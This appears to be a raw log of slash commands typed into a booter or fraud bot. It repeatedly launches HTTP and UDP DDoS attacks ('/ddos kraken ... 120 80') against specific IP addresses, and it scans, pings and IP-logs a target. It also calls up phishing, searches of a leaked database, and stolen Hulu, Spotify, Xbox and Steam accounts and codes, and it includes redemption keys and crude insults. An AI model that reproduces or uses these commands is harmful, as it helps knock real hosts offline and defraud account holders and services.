/dbadd skids ip
/ieatpoopondadaily
/methods
/accounts
/xboxcode
/accounts
/HULU
/DDoS http 131.150.187.240 200 minutes
/ddos {http}{131.150.187.240}{60 minutes}
/ddos kraken http 131.150.187.240 120 80
/ping 131.150.187.240
/account
/accounts
/xboxcode
/sms
/dbshow
/db show page
/dbshow page
/dbshow PAGE
/dbsearch ifuckedyourwife
/accounts
/xboxcode
/tr4p
/ping 131.150.187.240
/iplogger
/ping 131.150.187.240
/tr4p
/accounts
/hulu
/spotify
/hulu
/dbshow PAGE
/plan
/rank
/rank
/phish SITE
/lag
/xboxcode
/banhammer
/ddos kraken http 131.150.187.240 120 80
/ping 131.150.187.240
/ddos kraken http 131.150.187.240
/ddos kraken http 131.150.187.240 120 80
/ddos kraken http 131.150.187.240 120 80
/ddos kraken http 131.150.187.240 120 80
/ddos kraken udpplain 131.150.187.240 120 80
/plan
/xboxcode
/XBOXCODE
/xboxcode
/xboxcode
/xboxcode
/xboxcode
/claim/key
/claim key
/claim KEY
/claim TRAxJzraOXeQjHUAVHNE1GFVebEEqihBubSDvAMx7KOnYnOuyJ
/plan
/vpn
/tr4p
/ping 8.8.8.8
/ddos kraken http 8.8.8.8 100 80
/ping 8.8.8.8
/xboxcards
/xboxcard
/plan
/claim TRU63AIglyQuSHOHqNrGUNA1D7xVMSQ4gDrxINgVyrMeQOocV6
/claim TRU63AIglyQuSHOHqNrGUNA1D7xVMSQ4gDrxINgVyrMeQOocV6
/claim TRU63AIglyQuSHOHqNrGUNA1D7xVMSQ4gDrxINgVyrMeQOocV6
/claim TRQ8Rvw7VpV0oteT4YQJBWVBUKhsnlmvUBwgrHH3w7S6vhygwM
/plan
/plan
/plan
/plan
/accounts
/accounts
/steamcode
/steamcode
/checkip 172.58.184.129
/ddos kraken http 172.58.184.129 120 80
/ ddos http kraken 172.58.184.129 120 80
/ ddos kraken 172.58.184.129 120 80
/ddos udp Kraken 172.58.184.129 120 80
/ddos Kraken udp 172.58.184.129 120 80
/pingip  172.58.184.129
/ping 172.58.184.129
/tr4p
/nmapsv 172.58.184.129
/nmapresult
/nmapresult
/nmapresult
/ddos Kraken udp 172.58.184.129 120 80
/ping 172.58.184.129
/lag
